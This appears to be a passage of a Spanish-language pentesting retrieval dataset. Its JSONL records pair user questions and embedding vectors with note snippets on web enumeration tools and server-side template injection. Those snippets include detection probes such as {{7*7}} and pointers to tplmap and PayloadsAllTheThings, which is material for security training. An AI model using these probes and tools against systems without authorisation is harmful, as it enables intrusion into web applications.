0.00794, 0.01485, -0.0064, 0.01696, -0.01013, 0.08378, -0.03098, -0.02958, 0.00369, 0.01927, -0.08999, -0.00963, -0.01787, 0.0266, -0.02422, 0.08555, 0.02507, -0.17408, 0.04037, -0.00566, -0.02848, -0.02012, 0.04295, -0.06758, 0.00858, 0.02112, -0.03474, -0.00829, -0.12118, -0.02026, 0.05955, -0.09425, -0.05582, 0.05744, -0.00062, 0.00905, -0.03102, 0.07885, -0.02261, -0.04492, 0.0278, 0.00928, 0.03276, -0.01947, 0.01088, -0.03433, 0.0, -0.02993, -0.06356, -0.02583, -0.06523, -0.03624, -0.02485, -0.01093, 0.05271, -0.0474, 0.09271, -0.063, -0.10227, -0.00969, 0.01778, -0.02804, -0.06249, 0.03278, 0.09534, 0.00827, 0.02751, 0.00062, 0.04673, -0.02868, 0.03177, 0.01663, 0.0178, 0.03133, -0.0208, -0.00113, -0.04536, -0.04559, 0.04154, 0.01885, -0.02298, -0.00386, -0.07794, -0.00662, -0.01813, 0.02854, 0.02164, 0.01034, 0.06111, -0.08308, -0.01611, 0.04087, -0.0231, -0.03994, -0.03902, -0.01465, 0.0583, -0.04836, 0.03388, 0.01316]} +{"tipo": "pregunta", "herramienta": "Hacking web", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Herramientas\n- Burp Suite (intercepta y manipula TODO) + Burp Repeater e Intruder\n- Content discovery (gobuster/feroxbuster/ffuf)\n- `nikto`, `whatweb`, `wpscan`, `cmsmap` β†’ EnumeraciΓ³n web\n\nRelacionado: Recursos pΓΊblicos (PayloadsAllTheThings, HackTricks) Β· OSCP MOC", "indexar": "cual es una alternativa libre a las herramientas de enumeraciΓ³n web como nikto o whatweb", "v": [-0.11196, 0.07997, -0.0544, -0.06316, -0.07681, -0.0677, -0.10626, -0.0257, -0.13364, -0.12049, -0.14003, -0.15032, -0.08395, -0.03707, 0.14063, 0.03545, 0.10198, -0.1708, 0.12863, 0.00075, -0.13022, 0.01506, -0.09834, -0.01283, -0.05812, -0.1257, 0.05896, 0.04066, -0.14283, 0.10519, 0.00564, -0.01102, 0.06193, -0.02902, -0.03648, 0.08291, 0.10942, 0.10098, 0.04157, 0.01178, -0.00039, -0.07376, -0.09398, 0.09138, -0.02785, -0.0456, -0.08895, -0.01564, 0.04823, 0.05132, -0.08421, -0.03507, -0.11292, -0.0438, 0.07151, -0.07689, 0.25142, -0.12923, 0.00298, -0.06675, -0.15123, 0.06524, -0.03453, -0.00966, -0.01459, 0.02579, -0.10722, -0.00981, -0.06831, 0.15814, 0.08974, -0.04921, 0.08405, -0.03799, -0.00295, -0.01572, -0.08616, 0.03576, -0.07113, 0.02248, 0.02442, -0.05393, -0.01934, 0.05954, -0.04749, -0.03305, 0.08624, -0.07079, -0.00059, -0.04374, 0.08599, 0.09227, -0.04362, 0.05401, 0.00547, -0.0864, 0.03086, 0.05165, 0.0378, -0.00055, 0.05178, -0.0317, -0.12801, 0.03512, 0.04235, 0.03309, 0.00942, 0.08221, -0.16461, 0.00138, 0.01224, 0.07194, 0.01105, -0.01135, 0.01532, -0.02949, -0.05573, -0.01485, 0.00353, -0.0627, -0.00238, 0.00876, -0.06853, -0.05273, -0.00334, 0.04222, 0.04121, 0.01847, -0.00992, -0.06238, 0.06184, -0.02966, -0.09995, -0.0858, -0.04187, -0.05428, 0.03001, -0.07842, 0.05524, -0.02437, -0.00405, 0.00811, -0.07873, -0.03301, 0.05448, -0.09527, -0.00509, -0.02001, -0.07072, -0.0547, -0.09859, 0.00771, -0.01118, 0.10398, -0.05819, -0.0086, -0.09853, 0.03296, -0.0555, 0.01302, -0.04565, -0.0409, 0.03773, 0.03197, -0.00676, 0.03066, -0.01659, 0.02486, -0.04405, -0.0194, 0.03722, 0.09389, 0.03583, -0.08503, 0.03167, -0.02792, -0.07094, -0.06439, 0.00758, -0.04532, 0.03383, -0.01682, -0.07119, 0.03929, -0.03202, -0.04796, 0.02776, -0.00022, -0.03438, 0.06334, -0.0539, -0.01677, -0.08377, -0.10537, 0.04465, 0.07185, -0.02549, -0.04616, 0.0106, -0.03757, -0.07434, -0.07404, 0.00647, -0.05489, -0.0493, 0.03371, -0.02242, -0.01886, 0.01562, 0.03648, 0.01718, 0.00158, 0.03816, -0.03154, -0.00595, -0.01482, 0.02515, -0.00634, -0.07005, -0.01056, 0.04444, 0.01162, -0.0032, 0.0172, -0.01179, 0.03369, -0.00773, 0.04308, -0.01459, -0.00617, 0.00739, -0.0708, 0.00151, 0.02855, -0.01174, -0.04031, 0.00104, 0.02212, -0.04465, 0.0425, 0.02001, 0.03829, -0.0171, -0.00593, -0.03572, -0.01732, -0.08085, -0.05634, -0.05415, -0.04787, -0.05147, -0.0081, -0.00056, 0.02319, -0.00597, 0.02013]} +{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# SSTI (Server-Side Template Injection)\n\n> Tu input entra en una plantilla del servidor (Jinja2, Twig, Freemarker...) y se **evalΓΊa** β†’ RCE. Vector de Hacking web.", "indexar": "quΓ© herramienta me ayuda a detectar inyecciones de plantillas en servidores", "v": [-0.01802, 0.13318, -0.11781, -0.28931, 0.1573, -0.12463, -0.01793, -0.11952, 0.00689, -0.06702, -0.07828, 0.05528, 0.01971, -0.10945, 0.05187, 0.02185, 0.09647, -0.15206, 0.07762, -0.06286, -0.00948, -0.03096, -0.09834, -0.0147, -0.13314, 0.0027, 0.04648, -0.05095, -0.13972, -0.00494, -0.03365, -0.08336, -0.00349, 0.02076, -0.11183, -0.04698, -0.07599, 0.03357, -0.07531, 0.05036, -0.01853, 0.01637, -0.06091, -0.02954, 0.00065, 0.04817, -0.03206, -0.0098, 0.04074, 0.09034, -0.11607, -0.13597, -0.06403, -0.11129, -0.062, -0.10769, 0.18165, -0.07094, 0.06709, -0.15219, -0.20369, 0.0437, -0.03754, 0.02608, 0.03395, -0.05145, 0.00615, -0.13907, -0.09797, -0.06278, -0.11064, -0.0063, 0.03502, -0.0847, -0.02386, 0.04264, 0.02153, -0.01079, 0.0629, 0.00761, 0.04881, 0.01047, -0.02079, 0.04085, -0.06021, -0.05553, 0.02125, 0.07222, 0.05647, -0.1469, 0.04298, 0.06849, -0.04032, 0.05597, -0.04691, 0.03804, 0.13317, -0.09482, 0.01983, -0.00739, 0.06627, -0.0769, -0.04324, 0.03255, 0.00668, 0.04068, -0.03022, -0.04572, -0.10536, -0.06836, 0.10172, -0.03555, -0.00033, 0.00713, -0.03183, 0.02169, 0.08415, 0.02656, -0.05436, -0.0019, -0.01158, 0.05057, -0.01248, -0.02415, 0.03931, -0.05343, 0.01399, 0.02546, -0.0308, -0.09846, -0.04665, -0.07715, -0.11264, -0.01039, -0.04331, 0.02225, 0.03847, -0.09693, -0.05452, -0.00771, -0.03169, -0.00811, 0.01055, -0.0241, 0.06784, -0.01475, 0.06704, -0.02782, -0.05292, -0.00188, 0.06068, -0.04695, 0.04685, 0.02732, -0.08709, -0.03884, 0.0513, -0.00455, -0.11779, -0.00097, -0.03361, 0.01413, 0.0381, 0.0689, 0.01705, -0.02571, 0.04128, 0.04566, 0.08823, 0.0579, 0.03502, -0.03083, 0.04363, -0.03003, -0.01974, -0.05169, -0.06681, -0.01022, 0.03471, -0.02325, -0.01627, 0.00428, -0.00159, -0.05565, 0.0235, -0.05073, -0.02031, -0.02075, -0.00145, 0.04375, 0.04815, 0.02845, 0.00058, -0.03194, 0.07567, 0.0133, 0.01493, -0.04487, 0.02782, -0.01463, -0.01496, -0.02981, -0.05015, -0.0451, 0.02838, 0.05226, -0.09549, 0.02338, 0.01809, 0.01687, 0.03608, 0.02717, 0.06964, -0.02118, -0.01361, -0.00251, 0.00947, 0.00865, -0.03304, -0.03444, 0.02865, 0.01585, 0.08544, -0.01413, -0.0461, 0.03739, 0.03542, 0.03346, 0.04327, 0.03764, 0.04199, -0.02203, 0.00289, -0.00661, -0.04672, -0.09729, 0.04346, -0.04142, -0.04219, -0.04915, 0.03368, 0.06755, 0.02512, -0.03586, 0.00734, -0.07152, 0.01816, -0.05566, -0.03074, -0.02682, -0.02957, 0.02272, 0.07176, -0.055, 0.05597, -0.04097]} +{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# SSTI (Server-Side Template Injection)\n\n> Tu input entra en una plantilla del servidor (Jinja2, Twig, Freemarker...) y se **evalΓΊa** β†’ RCE. Vector de Hacking web.", "indexar": "con quΓ© programa puedo buscar vulnerabilidades de SSTI", "v": [0.04455, -0.00355, -0.24073, -0.07568, 0.02835, -0.10737, -0.0397, -0.25762, -0.03213, 0.00891, -0.00688, -0.01852, -0.00849, -0.1356, -0.00935, 0.14589, 0.05655, -0.12723, 0.00222, 0.07368, 0.04927, -0.11597, 0.03836, -0.04663, -0.02461, 0.02619, 0.01065, -0.03999, 0.02091, -0.05693, -0.05018, -0.02582, 0.04116, -0.08574, -0.02617, 0.06789, -0.00438, -0.00796, 0.07286, 0.04124, 0.11553, 0.007, 0.02656, -0.06527, 0.08961, -0.04762, -0.02408, -0.07555, -0.01343, -0.01097, -0.02052, 0.01589, -0.11048, -0.05144, 0.02163, -0.00241, 0.08743, -0.14995, 0.01141, 0.03451, -0.07435, 0.03166, 0.02458, -0.02092, 0.07769, -0.02835, 0.12241, 0.03592, -0.18713, 0.07439, 0.00914, -0.03328, -0.02268, -0.0737, -0.01321, 0.10974, 0.0009, -0.02019, -0.00145, -0.04602, -0.08075, 0.06206, 0.12846, 0.11969, -0.13047, -0.08361, 0.0393, -0.0126, 0.00371, -0.05765, 0.05288, 0.04277, -0.05362, 0.11464, 0.00257, -0.05146, 0.12662, 0.03306, -0.04348, 0.06935, -0.08958, -0.08365, -0.04659, 0.14215, 0.00848, 0.075, 0.04948, 0.03508, -0.02212, 0.02829, -0.05164, -0.05751, -0.08027, -0.07655, -0.06846, 0.02655, -0.076, -0.03691, 0.10182, -0.05905, -0.06626, -0.02066, -0.09072, 0.03341, 0.10277, 0.01868, 0.02006, 0.10265, -0.04955, 0.01354, 0.00291, -0.01763, 0.01846, -0.02852, 0.03508, -0.07363, 0.03247, -0.08449, 0.0014, -0.03262, 0.01241, -0.0053, 0.0628, 0.03179, -0.01686, 0.00872, 0.01481, -0.03546, -0.04562, 0.0014, 0.0268, 0.0195, 0.02117, 0.06387, -0.01791, -0.01499, -0.003, -0.04124, -0.02077, 0.07338, -0.01999, 0.05003, -0.07531, -0.01549, 0.09729, 0.01855, 0.07569, 0.00153, 0.06887, 0.06102, -0.03866, 0.08689, 0.07395, -0.06946, -0.0033, -0.0664, 0.03921, -0.06456, 0.02922, -0.09116, -0.09164, 0.00808, 0.05094, -0.00347, -0.02662, -0.03687, -0.02941, 0.0455, 0.05467, -0.04335, -0.02166, -0.01943, 0.0047, 0.05645, 0.04057, -0.01528, 0.03123, 0.0293, -0.01337, -0.09269, -0.14289, 0.02019, -0.06317, -9e-05, 0.0893, 0.11126, 0.00673, -0.00904, 0.06293, 0.12058, 0.04568, -0.05504, 0.06757, -0.05335, -0.07043, -0.05246, -0.01666, 0.07432, 0.06066, 0.07, -0.02679, 0.0063, 0.03428, 0.10745, 0.02091, -0.07367, -0.0231, 0.0022, 0.02161, 0.03357, 0.0206, -0.06778, -0.04456, -0.04857, 0.07413, 0.00333, -0.02908, -0.01336, 0.00304, 0.01277, -0.03252, 0.0292, -0.01278, -0.04963, -0.00972, -0.02393, -0.04146, 0.00109, -0.01521, -0.00294, -0.05381, 0.06073, 0.02328, -0.1036, 0.04262, -0.02541]} +{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# SSTI (Server-Side Template Injection)\n\n> Tu input entra en una plantilla del servidor (Jinja2, Twig, Freemarker...) y se **evalΓΊa** β†’ RCE. Vector de Hacking web.", "indexar": "cual es una tΓ©cnica para evaluar si hay riesgos de RCE mediante inyecciΓ³n de plantillas", "v": [0.15002, 0.00535, -0.11735, -0.0953, 0.24649, -0.02194, 0.05126, -0.10773, 0.0303, -0.06955, 0.00945, 0.07544, 0.08214, -0.00263, 0.11667, 0.1187, -0.03653, -0.00229, -0.01125, -0.07213, -0.04241, -0.21337, -0.1665, 0.03675, -0.01668, 0.07776, -0.032, -0.05354, -0.05579, -0.07802, 0.01338, 0.08519, 0.08338, -0.04535, -0.08092, 0.00166, -0.0349, 0.01743, -0.01126, 0.00044, -0.06155, -0.04664, -0.16597, 0.05254, 0.13203, -0.06512, 0.05589, 0.10945, 0.0695, 0.01314, -0.03105, 0.07926, -0.00974, -0.12064, 0.02875, 0.01944, 0.12234, 0.00652, -0.06157, -0.1111, -0.00675, 0.03383, 0.06649, -0.02643, -0.0416, -0.06631, -0.02034, -0.03236, -0.05515, -0.07151, 0.01412, -0.04531, -0.03227, -0.07174, -5e-05, -0.00635, -0.04689, 0.11296, 0.01189, -0.09248, -0.01215, -0.01052, -0.05466, 0.05752, -0.12753, -0.01769, 0.08252, -0.0301, 0.08376, -0.10584, 0.08676, -0.08426, -0.03533, -0.02791, -0.0779, -0.04404, 0.08953, 0.02607, -0.02142, 0.01319, 0.01768, -0.02801, 0.0244, 0.04159, -0.0426, 0.07712, -0.04422, -0.0872, 0.00994, -0.05982, -0.07039, 0.09011, -0.08561, -0.04459, -0.06909, -0.00047, 0.01996, -0.04556, -0.07879, -0.06504, -0.04474, 0.02426, -0.03267, -0.05769, 0.02125, -0.06354, -0.01583, 0.02008, -0.04505, 0.06343, -0.06912, -0.00268, -0.05627, -0.03642, -0.01597, 0.03334, 0.0572, -0.11723, -0.08929, -0.0875, 0.03006, 0.08137, 0.05924, 0.01339, 0.07805, 0.07063, 0.00572, -0.0967, -0.04917, -0.01579, 0.01775, 0.07845, 0.02357, 0.15771, -0.0157, -0.03918, 0.00268, -0.0517, -0.02616, 0.10894, 0.04738, 0.1129, 0.03952, 0.02492, -0.03415, -0.0165, -0.01306, -0.08048, 0.04488, 0.04201, 0.01709, 0.02705, -0.00578, -0.00698, 0.07851, 0.04425, -0.04879, -0.0702, 0.04533, -0.03231, -0.01096, -0.03681, -0.02454, 0.02688, 0.05547, -0.02566, -0.05588, 0.05102, 0.0409, 0.06915, -0.00328, 0.05621, -0.07198, -0.01407, -0.01911, -0.00903, 0.0126, -0.04698, 0.00958, -0.01669, -0.05732, -0.00106, -0.07615, -0.07668, 0.04293, 0.01112, -0.05724, -0.02701, -0.06746, 0.01618, 0.07334, -0.04539, 0.07406, -0.03569, 0.00097, -0.04581, 0.00507, 0.00304, -0.0037, 0.04039, -0.02177, 0.02186, 0.10071, -0.08022, -0.03544, -0.04003, 0.03798, 0.02721, 0.03426, 0.022, -0.01596, 0.03849, -0.03159, 0.00486, 0.08389, 0.02432, 0.05905, -0.0529, -0.03786, -0.10343, 0.0377, 0.06719, -0.02056, -0.03506, 0.01078, -0.05178, -0.10542, -0.00582, 0.01173, -0.11745, 0.00927, 0.04441, 0.0276, -0.02902, 0.03746, -0.10416]} +{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## DetecciΓ³n\n```\n{{7*7}} β†’ si responde 49 β†’ vulnerable (Jinja2/Twig)\n${7*7} β†’ Freemarker / otros\n<%= 7*7 %> β†’ ERB (Ruby)\n#{7*7} β†’ Ruby/otros\n```\nSi `{{7*7}}` devuelve `49` (no el literal), hay SSTI.", "indexar": "que programa detecta inyecciΓ³n de plantillas de seguridad", "v": [0.21299, 0.0175, -0.1283, -0.32365, 0.1574, -0.09553, -0.0361, -0.08233, 0.02197, 5e-05, 0.07844, 0.10893, -0.01228, -0.00776, -0.03047, -0.01668, 0.02703, -0.11594, 0.05296, -0.06904, -0.05807, -0.10851, -0.07012, -0.10306, -0.0324, 0.10507, -0.09968, 0.05573, -0.0467, -0.09548, -0.00339, -0.06249, 0.05944, 0.02181, -0.07702, 0.01227, -0.0594, -0.02548, 0.02596, 0.07365, -0.03145, -0.0407, -0.04109, -0.02793, 0.15301, 0.03984, 0.13698, -0.02296, 0.0695, -0.04448, -0.05982, 0.06487, 0.04888, -0.15266, 0.02846, -0.11069, 0.05516, -0.03039, -0.0193, -0.05569, -0.08346, 0.009, 0.08744, 0.02755, -0.00802, -0.01906, 0.06642, -0.01187, -0.03885, -0.10082, 0.04974, -0.06755, 0.03719, 0.0045, -0.01834, -0.06326, -0.02607, 0.01689, -0.00793, 0.04131, -0.05296, -0.01867, 0.03355, 0.06638, -0.11824, 0.01778, 0.02527, 0.02882, -0.03491, -0.0301, 0.1201, 0.06148, -0.00363, 0.11336, 0.00168, -0.00961, 0.13916, -0.02504, -0.02581, 0.04174, 0.00385, -0.08628, -0.02614, 0.07245, 0.02947, 0.08584, -0.03277, 0.01063, 0.02341, -0.04545, 0.03039, -0.00246, -0.02329, -0.08873, -0.07163, 0.04413, 0.09474, 0.06671, 0.03582, -0.07625, -0.07467, 0.00627, -0.04441, -0.02875, 0.08138, -0.03652, -0.08984, 0.04309, -0.10758, 0.01655, -0.01881, -0.03573, -0.08123, 0.02582, -0.09957, 0.00885, -0.0603, -0.07912, -0.037, -0.00998, 0.0363, 0.06158, 0.12482, 0.06696, 0.02555, 0.02744, -0.03596, -0.04431, 0.00562, 0.04853, 0.03231, 0.07167, 0.04027, 0.06124, -0.06039, 0.00016, 0.03086, -0.04527, -0.06594, 0.08104, 0.02982, 0.07154, -0.02147, 0.03937, 0.0475, -0.01936, 0.04015, -0.04209, 0.10443, 0.09179, 0.04799, 0.08339, 0.08721, -0.05319, -0.0112, 0.03053, -0.03056, -0.12421, 0.0437, -0.02926, -0.05413, -0.00327, 0.04667, -0.00095, 0.09423, -0.07615, -0.05543, 0.1144, 0.01809, 0.01641, 0.005, -0.00268, -0.0504, 0.00608, -0.02177, 0.00357, 0.04718, 0.01427, 0.00985, 0.00245, -0.03327, 0.01394, -0.00974, -0.03032, 0.08649, 0.04786, -0.01783, -0.02398, 0.03683, 0.07314, 0.03225, -0.01595, 0.00999, 0.00145, -0.01101, -0.08031, -0.00212, 0.042, 0.01204, 0.04716, 0.00778, -0.0242, 0.05756, -0.01495, -0.05374, -0.10743, -0.01721, 0.04495, 0.04838, 0.03128, 0.02929, -0.03126, -0.07788, 0.00121, 0.03361, -0.05707, -0.02405, 0.00996, -0.04014, -0.10481, -0.02198, 0.03761, -0.00966, -0.03474, -0.04655, -0.01711, -0.03972, -0.0369, 0.06289, -0.02954, -0.03086, 0.08623, 0.06719, -0.05714, 0.03271, -0.01788]} +{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## DetecciΓ³n\n```\n{{7*7}} β†’ si responde 49 β†’ vulnerable (Jinja2/Twig)\n${7*7} β†’ Freemarker / otros\n<%= 7*7 %> β†’ ERB (Ruby)\n#{7*7} β†’ Ruby/otros\n```\nSi `{{7*7}}` devuelve `49` (no el literal), hay SSTI.", "indexar": "con quΓ© herramienta verifico si una aplicaciΓ³n tiene fallos de inyecciΓ³n de plantillas", "v": [0.14812, 0.10416, -0.19011, -0.14933, 0.18049, -0.07185, -0.00881, -0.06515, 0.04774, -0.01676, -0.00628, 0.03336, -0.03298, 0.00714, 0.05565, 0.02267, 0.02474, -0.23594, -0.03532, 0.02556, -0.09983, -0.08892, -0.22923, -0.09215, -0.14228, 0.11548, -0.05186, 0.00362, -0.19483, -0.05494, 0.05505, -0.0198, 0.06716, -0.0428, -0.0946, -0.02416, -0.11711, 0.0251, -0.01545, 0.10341, -0.01432, 0.02685, -0.09363, 0.02484, -0.06141, -0.03751, 0.0229, 0.03, -0.01412, 0.07586, -0.0161, -0.1522, -0.02551, -0.012, -0.09215, -0.17442, 0.20579, -0.05469, 0.10618, -0.08043, -0.15996, -0.01304, 0.02874, 0.04716, -0.02161, -0.06443, 0.03434, 0.04222, 0.02769, -0.021, -0.04523, 0.0158, -0.03898, 0.00724, 0.00163, 0.00991, -0.00513, 0.03301, 0.01346, -0.01238, -0.01994, -0.06998, -0.06762, 0.01572, -0.08272, -0.00333, 0.05188, 0.01864, 0.00661, -0.12593, -0.00112, 0.02573, -0.03891, -0.01896, -0.03065, 0.01984, 0.08666, -0.03865, 0.03213, -0.01136, 0.0648, -0.07501, -0.0468, 0.02866, -0.03689, 0.04976, -0.03245, -0.05345, -0.01886, -0.00403, 0.08133, -0.04015, 0.02234, -0.01322, -0.02739, 0.0676, 0.00795, -0.03094, -0.05879, -0.10497, -0.00388, -0.00455, -0.01266, -0.1214, 0.02943, -0.02158, -0.03509, 0.08347, -0.04764, -0.0064, 0.01906, -0.02869, -0.13072, 0.05333, -0.04468, -0.02248, 0.03943, -0.0748, -0.04156, -0.02612, 0.01222, 0.03819, 0.05891, 0.00024, 0.07859, 0.02665, -0.08774, -0.02916, -0.05699, 0.00308, 0.04263, -0.05022, 0.02063, 0.09693, -0.08776, -0.01692, 0.01241, -0.03784, -0.02438, 0.06026, -0.02974, -0.05019, -0.00049, 0.06955, 0.01474, -0.0525, 0.01571, -0.00362, 0.04269, 0.06106, 0.02028, 0.05484, -0.02153, -0.07786, -0.0104, -0.03017, -0.05207, -0.01989, 0.03324, -0.06378, -0.05377, -0.00193, -0.02546, 0.001, 0.03506, -0.06556, -0.02528, 0.03568, 0.0644, 0.02624, 0.01885, 0.06318, 0.0337, -0.04005, 0.04362, 0.0245, 0.00329, -0.0373, 0.01214, 0.01537, -0.07908, -0.00514, -0.04938, -0.06704, 0.05266, 0.09237, -0.05624, 0.0002, -0.03702, 0.07043, 0.04427, 0.00463, 0.0585, 0.03467, -0.02389, -0.0593, 0.02821, 0.01917, -0.03489, -0.01999, 0.02751, -0.01828, 0.06575, -0.04272, -0.04358, 0.01779, 0.02002, 0.01634, -0.00559, 0.07442, 0.02386, -0.02055, -0.05273, -0.0453, 0.07733, -0.0212, 0.06251, -0.0061, -0.06232, -0.07276, 0.00731, 0.05581, 0.02043, -0.01011, -0.01758, -0.02928, -0.02282, -0.07674, 0.00277, -0.08313, -0.02131, 0.07724, 0.08904, -0.06968, 0.03785, -0.06397]} +{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## DetecciΓ³n\n```\n{{7*7}} β†’ si responde 49 β†’ vulnerable (Jinja2/Twig)\n${7*7} β†’ Freemarker / otros\n<%= 7*7 %> β†’ ERB (Ruby)\n#{7*7} β†’ Ruby/otros\n```\nSi `{{7*7}}` devuelve `49` (no el literal), hay SSTI.", "indexar": "cual es una alternativa libre a los test de detecciΓ³n de SSTI", "v": [0.11954, -0.05461, -0.21625, 0.01718, 0.00193, -0.11028, -0.15631, -0.19001, -0.00178, 0.09993, -0.10633, -0.11953, -0.10046, -0.06574, 0.09665, 0.03354, 0.07469, -0.12198, 0.00087, -0.09212, -0.00379, -0.13979, -0.04106, -0.01967, 0.08126, 0.03971, -0.06406, 0.04657, -0.02202, -0.03476, 0.0054, -0.04966, 0.04879, -0.0345, -0.05712, -0.00497, 0.0389, -0.04589, 0.17103, 0.08801, 0.08106, -0.14262, 0.08588, 0.00275, -0.02335, -0.03585, -0.0585, 0.0391, -0.03757, 0.10783, -0.00703, 0.07797, -0.06185, -0.01683, -0.0595, -0.00341, 0.0608, -0.04365, 0.01004, -0.05627, -0.05219, -0.0097, -0.03516, -0.05681, 0.06487, -0.02949, 0.0121, 0.05736, -0.16938, -0.01816, 0.07801, -0.00931, 0.02267, -0.02492, -0.1205, 0.10082, 0.0031, -0.01511, 0.00651, 0.00256, 0.00897, -0.04839, 0.08846, 0.07743, -0.02927, -0.0807, 0.00889, -0.12827, -0.039, 0.01172, -0.03204, 0.00618, -0.00637, 0.18444, -0.02713, -0.07044, 0.08501, 0.00513, 0.03327, 0.08958, 0.07596, -0.07512, -0.09569, 0.05642, 0.0598, -0.0437, -0.03747, 0.09629, -0.06454, -0.02964, 0.00187, -0.00952, -0.10722, -0.03535, -0.07208, -0.06168, -0.02122, 0.02256, -0.02043, -0.01722, -0.0827, -0.02611, -0.10113, -0.12255, 0.02119, -0.05315, 0.02057, 0.03912, -0.05652, 0.03306, 0.07064, 0.07375, -0.04649, -0.06587, -0.04135, -0.06559, 0.06028, -0.08642, -0.029, 0.00144, -0.00865, -0.02122, 0.0668, -0.01652, 0.01346, -0.07397, -0.02378, -0.01031, -0.02492, -0.03046, -0.10184, 0.00697, -0.00399, 0.10153, -0.02351, 0.0341, 0.0112, 0.0021, 0.01331, 0.06848, -0.0233, -0.08692, -0.02004, 0.04429, 0.07319, 0.05465, 0.04436, -0.08642, -0.05384, -0.04704, 0.06462, 0.0234, 0.01631, -0.07815, 0.07294, -0.02103, 0.01836, -0.10255, 0.01209, -0.13502, -0.01495, 0.08553, -0.10893, -0.0695, 0.00413, -0.01643, -0.01414, 0.00958, 0.07194, -0.00775, 0.01021, 0.02439, -0.04663, 0.00334, 0.017, 0.02512, 0.05907, -0.04382, 0.01465, -0.04868, -0.14082, -0.04085, -0.08998, -0.02163, -0.0126, 0.02586, -0.01827, 0.03611, 0.06125, 0.00835, 0.08545, -0.00204, 0.08718, -0.03156, -0.0645, 0.00014, -0.00454, -0.00823, 0.01193, 0.02496, 0.01063, 0.02901, 0.04266, 0.05861, -0.05666, 0.02195, -0.01416, 0.07198, 0.07026, 0.01433, 0.08502, -0.01585, 0.02133, 0.04523, 0.04552, -0.01091, 0.0162, 0.00041, -0.00387, -0.0324, 0.02518, 0.05163, -0.06451, -0.03021, -0.02221, 0.02244, -0.07158, -0.07344, -0.05922, -0.03792, -0.01557, 0.0206, 0.07017, -0.01667, 0.05763, 0.01402]} +{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Identificar el motor\nUsa el Γ‘rbol de polyglots de PayloadsAllTheThings (Recursos pΓΊblicos) o **tplmap** para automatizar.", "indexar": "ΒΏQuΓ© herramienta me ayuda a identificar automΓ‘ticamente los motores web?", "v": [0.0954, 0.20506, -0.03772, -0.14494, 0.02636, -0.02811, -0.116, -0.02757, -0.13326, -0.10748, -0.17751, -0.07347, 0.06006, -0.03563, 0.05692, 0.05722, 0.11525, -0.14881, -0.02064, -0.06313, 0.0392, -0.09461, -0.10466, -0.06755, -0.06564, -0.00156, 0.05002, 0.02867, -0.27658, -0.0106, -0.01516, 0.03515, 0.0394, 0.00992, -0.1656, -0.05519, 0.01359, 0.05113, 0.03109, 0.05087, -0.06142, -0.01969, -0.03883, 0.02874, 0.06729, 0.04299, -0.04718, -0.05984, 0.03707, 0.02524, -0.00975, -0.09298, -0.02798, -0.04508, -0.01474, -0.09876, 0.24116, -0.11446, -0.0273, -0.14484, -0.10264, 0.01929, -0.1074, 0.04787, -0.02161, -0.01191, 0.04863, -0.12124, -0.03739, 0.0701, -0.05241, 0.0161, 0.11843, -0.03515, 0.01127, 0.02526, 0.07759, 0.04671, 0.09352, -0.02688, 0.1276, 0.03571, -0.02895, 0.0256, 0.0531, -0.02171, 0.01387, -0.07726, 0.02439, -0.11155, -0.03305, 0.07753, -0.00015, 0.08458, -0.01914, 0.06654, 0.04242, -0.035, -8e-05, -0.02927, 0.08585, -0.17917, -0.03978, 0.06434, 0.07468, -0.02551, 0.04254, -0.01114, -0.16151, 0.00329, 0.06799, 0.00643, -0.05391, -0.02679, -0.01205, 0.07364, 0.0262, -0.00013, 0.01989, -0.10485, -0.02009, 0.05503, -0.00539, 0.02016, -0.03584, 0.00249, -0.01605, 0.12833, 0.00359, -0.08741, 0.00918, -0.06584, -0.07681, -0.05042, -0.0068, 0.05414, 0.03697, -0.08184, 0.01773, -0.01812, 0.05154, -0.01164, -0.04544, -0.1066, 0.03715, -0.05711, -0.0084, -0.07879, -0.03874, 0.02022, -0.02239, -0.06076, 0.04012, 0.03274, -0.05365, -0.00864, -0.03402, 0.01355, -0.06365, -0.051, -0.04682, -0.05446, 0.04768, -0.0372, -0.00046, 0.0264, -0.001, 0.01931, 0.04591, -0.0009, 0.05374, 0.00172, 0.03189, -0.00327, 0.00843, -0.0084, -0.03913, -0.03003, 0.00971, -0.02156, -0.06582, -0.01477, -0.01208, -0.01588, -0.01167, -0.03268, 0.07673, -0.0779, -0.01503, 0.07038, -0.00482, 0.00206, -0.04226, -0.04532, 0.068, 0.04593, -0.06519, -0.03247, 0.06105, -0.03136, -0.04848, -0.04492, -0.01563, -0.05884, -0.01308, 0.09294, -0.0304, -0.0606, 0.01973, -0.00279, 0.0014, 0.0402, 0.05436, -0.03015, -0.00983, 0.00648, -0.02706, 0.00893, -0.065, -0.0565, 0.033, -0.03758, 0.06629, 0.02861, 0.01359, 0.07349, 0.06144, 0.04503, 0.02933, 0.00283, 0.00734, -0.01672, 0.00447, -0.0048, 0.04762, -0.03479, 0.01968, -0.0673, -0.04505, 0.04529, 0.02786, 0.00978, 0.0628, -0.00374, 0.00252, -0.03663, 0.02089, -0.04101, -0.0565, 0.00912, -0.03112, -0.00658, 0.01378, -0.04271, 0.07035, 0.02467]} +{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", 